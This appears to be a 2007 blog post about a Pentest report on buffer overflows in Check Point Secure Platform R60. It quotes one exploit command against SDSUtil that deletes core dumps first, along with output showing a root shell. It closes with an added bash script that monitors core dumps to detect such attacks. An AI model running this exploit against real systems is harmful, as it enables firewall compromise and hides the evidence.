1 October 2007
Buffer overflows in Check Point, by Pentest
In case it is of interest to you, we have just published a report (in English) that
describes the whole exploitation process for several flaws (buffer overflows) in the
Check Point firewall. Specifically, the version evaluated is Secure Platform R60, which
had been certified by the NSA and NIST at EAL4+. The report exposes the weakness of the
certification processes carried out by the US government.
http://www.checkpoint.com/press/2006/ealusgov100406.html
http://www.pentest.es/checkpoint_hack.pdf
---> Honestly, I don't understand any of it, but the PDF is really well put together, over 200 pages, and full of things like:
[Expert@fw1pentest]# ]# rm -f /var/log/dump/usermode/SDSUtil.* ; /opt/CPsuite-R60/fw1/bin/SDSUtil -p 123123 123123 `perl -e 'print "B"x4'``perl -e 'print "12345678"x1029'``perl -e 'print "\x50\x5c\x55\x77ABCD\x9a\xa8\x5d\x77"'`
bash: ]#: command not found
Info; OpenConn; Enable; NA
Error; OpenConn; Enable; Unresolved host name.
sh-2.05b# exit
exit
Segmentation fault (core dumped)
---> and it says this:
What are the affected products?
It's difficult for us to tell how many products, versions and platforms are affected, but
I think that almost any Check Point product based on Secure Platform could be vulnerable. That
includes the UTM-1, etc. Also, any platform having the same binaries as the affected ones could be
vulnerable. So a lot of Check Point products should be affected…
Is there any workaround until the vendor releases patches?
Yes. The easy, non-intrusive way is to monitor the directory where core dumps are created.
As an example, in Secure Platform that is "/var/log/dump/usermode/". Write a script that
monitors for any change. If you see files there… bad things are happening to your firewall.
---> And it also says:
Check Point was first contacted on 19-03-07. Since then, many other attempts were made
and at last we were redirected to our country (Spain). We contacted Check Point's representative in our country and many approach attempts were made. The feedback was very
poor and after months of waiting we decided to release this work to the community.
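The core-dump monitoring workaround quoted above is only a sentence in the report; here is one way to actually implement it. This is an added example, not code from the Pentest report or from Check Point. It assumes a bash/POSIX shell with coreutils (sort, comm, wc) and, optionally, logger, which a RHEL-based Secure Platform box has, and it assumes there is no inotify tooling, so it polls. The directory, interval and state paths (CORE_DIR, INTERVAL, STATE_DIR) are illustrative defaults. It goes slightly beyond the quoted advice: besides new files it also flags a core file whose size changed between polls, i.e. a dump still being written.

```shell
#!/bin/bash
# Added example: poll the Secure Platform core-dump directory and alert on
# anything new. Not part of the Pentest report. Paths below are assumptions.
export LC_ALL=C   # stable sort order so comm(1) can compare snapshots

CORE_DIR="${CORE_DIR:-/var/log/dump/usermode}"   # where SecurePlatform writes user-mode cores
INTERVAL="${INTERVAL:-30}"                       # seconds between polls
STATE_DIR="${STATE_DIR:-/var/tmp/coremon}"       # where the baseline snapshot is kept

# Print "name<TAB>bytes" for every regular file in $1, sorted by name.
snapshot_dir() {
    local f
    for f in "$1"/*; do
        [ -f "$f" ] || continue
        printf '%s\t%s\n' "${f##*/}" "$(wc -c < "$f" | tr -d ' ')"
    done | sort
}

# Print the entries that exist in snapshot file $2 but not in $1: new files,
# or files whose size changed (a dump still being written). Returns 1 if any.
diff_snapshots() {
    local added
    added=$(comm -13 "$1" "$2")
    [ -z "$added" ] && return 0
    printf '%s\n' "$added"
    return 1
}

# One monitoring pass over directory $1 against baseline file $2.
# Returns 0 when nothing changed, 1 (after alerting) when a core appeared.
check_once() {
    local dir="$1" state="$2" cur="$2.new" found
    mkdir -p "$(dirname "$state")"
    [ -f "$state" ] || : > "$state"          # first run: empty baseline
    snapshot_dir "$dir" > "$cur"
    if found=$(diff_snapshots "$state" "$cur"); then
        mv "$cur" "$state"
        return 0
    fi
    # A core under /var/log/dump/usermode means a Check Point user-mode
    # process (e.g. SDSUtil in the transcript above) just crashed.
    if command -v logger >/dev/null 2>&1; then
        logger -t coremon -p auth.crit \
            "new core dump(s) in $dir: $(printf '%s' "$found" | cut -f1 | tr '\n' ' ')" || true
    fi
    printf 'ALERT: new core dump(s) in %s:\n%s\n' "$dir" "$found" >&2
    mv "$cur" "$state"                        # adopt so we alert once per file
    return 1
}

# Daemon loop; start with: nohup ./coremon.sh --daemon &
monitor_loop() {
    while :; do
        check_once "$CORE_DIR" "$STATE_DIR/baseline" || true
        sleep "$INTERVAL"
    done
}

if [ "${1:-}" = "--daemon" ]; then
    monitor_loop
fi
```

Because the baseline is updated after every alert, each core is reported once; the ALERT lines on stderr and the auth.crit syslog entry are what you would ship off the box, since an attacker who gets a shell (as the sh-2.05b# prompt above shows) can simply delete the dumps afterwards.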
